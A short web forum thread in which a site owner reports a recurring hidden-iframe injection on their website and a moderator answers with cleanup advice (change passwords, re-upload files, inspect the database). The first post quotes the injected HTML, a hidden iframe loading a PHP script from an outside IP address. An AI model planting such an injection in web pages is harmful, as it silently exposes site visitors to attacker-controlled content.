SitePoint Sponsor

User Tag List

Results 1 to 2 of 2
  1. #1
    SitePoint Member
    Join Date
    Apr 2012
    Posts
    1
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Exclamation Iframe injection attack

    This appears really random , it does not have logic when it is appearing . It may disapear after a few refreshes , or it may be not there for a 1-2 days but after that it appears again.

    HTML Code:
    <div style="visibility:hidden"><iframe src="http://65. 126. 238. 126/scrp.php" width=10   height=10></iframe></div>
    My server seem to be secure , i have checked all the files for viruses and malware and stuff like that . But it shows on the website anyway

    If somebody encounter this problem as well please post what you have done in order to get rid of it .

    Thank you
    Regards
    Sergiu C.

  2. #2
    Certified Ethical Hacker silver trophybronze trophy dklynn's Avatar
    Join Date
    Feb 2002
    Location
    Auckland
    Posts
    14,672
    Mentioned
    19 Post(s)
    Tagged
    3 Thread(s)
    Sergiu,

    Obviously, your server is NOT secure!

    IMMEDIATELY change your cPanel and FTP passwords to something strong (http://strongpasswordgenerator.com has good hints and can generate near-impossible-to-crack passwords for you but be sure to use at least 11 characters which include both cases, digits and special characters - spaces, too, if permitted by your host) THEN DELETE all your files and only then, upload to refresh. If you're using databases, dump EVERYTHING and look through it for a table which doesn't belong and inappropriate values in the table fields (especially for login records).

    FWIW, 65.126.238.126 resolves to hu3.hostutopia.net. If that's not you, then they are the ones hacking you (report them to your local police and your host with a DEMAND that they pursue the hacker, too). If that IS you, look for the scrp.php file and see what that's sending to the hacker.

    Regards,

    DK
    David K. Lynn - Data Koncepts is a long-time WebHostingBuzz (US/UK)
    Client and (unpaid) WHB Ambassador
    mod_rewrite Tutorial Article (setup, config, test & write
    mod_rewrite regex w/sample code) and Code Generator


Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •